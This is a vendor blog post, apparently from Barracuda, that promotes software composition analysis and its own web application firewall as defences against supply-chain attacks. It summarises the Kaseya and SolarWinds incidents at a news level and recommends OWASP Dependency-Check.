Software Composition Analysis and Defense-in-Depth

Print Friendly, PDF & Email

As the number and sophistication of attacks continues to increase, many organisations are adopting a defence in depth approach to cyber security. That means taking a deeper dive into software composition analysis (SCA) to defend against supply-chain attacks.

For evidence of the rising importance of this issue, you can see our recent research, ‘The State of Application Security Report 2021’. The second most popular solution to deploy over the next 12 months is software supply-chain protection scanning, while another 30 per cent of respondents are looking to use software supply-chain protection as a standalone service. SCA is already the most popular defence against software supply-chain attacks – used by 59 per cent of US and Asia-Pacific organisations.

Software today is made up of dozens of different components – any one of which could contain its own vulnerabilities. So a typical website may include components for counting visitors, for running ecommerce, for hosting and displaying adverts or for personalising content. And many of these components are themselves made up of components from other vendors or open-source libraries. That means a multiplicity of potential vulnerabilities. It means that any software purchase effectively forces you to trust that dozens of unknown suppliers and developers have carried out proper due diligence.

And as our survey showed, this is not just a theoretical threat. Almost three-quarters of organisations surveyed (72 per cent) said their organisation had suffered at least one breach through a software vulnerability in the past year.

SCA is about checking the individual components that make up any application, or a new version of an application, for known vulnerabilities. But attackers are also going after well-known software providers to get into company supply chains.

The latest high-profile supply-chain attack used Kaseya – a popular IT management and security tool – to hide malware that infected hundreds of businesses around the world. Kaseya is used by many managed service providers who host corporate IT systems. The attack maximised damage by hitting over the Fourth of July holiday weekend in the US, when many businesses were closed. The criminals responsible for the malware, REvil group, demanded $70m in Bitcoin to decrypt business data. After being infected, it took Kaseya over a week to get its systems back up and running.

But the most damaging recent supply chain breach was the SolarWinds attack, which hit the headlines in December 2020 but is still claiming victims today. Cyber criminals inserted a back door into SolarWinds’ widely used network management software, which left thousands of its customers vulnerable. Organisations that were compromised included highly secure parts of the US government like the Department of Energy, Homeland Security and the State Department.

The good news is that although SCA is a new segment, there are free tools to help you secure your software. The Open Web Application Security Project provides a Dependency Checker tool that can scan your applications for known vulnerabilities and offer solutions – often components just need upgrading and not replacing entirely.

Using this scanning tool should not be a one-off. It should be part of your regular software audit and run whenever new software is added or old applications updated. The checker regularly and automatically updates itself to check for new vulnerabilities.

This should form part of a defense-in-depth approach because SCA is not a magic bullet. Still, when used with Barracuda’s WAF v11 and WAF-as-a-Service offers client-side protection to help bolster this defense-in-depth and reduce the risks of supply-chain attacks by identifying changes to code in the server response (SRI) and injecting browser security policies (CSP) at runtime.

To find out more about real-world threats and how organisations around the world are countering them, download our State of Application Security Report. It includes insights from over 750 security decision makers from around the world.

Scroll to top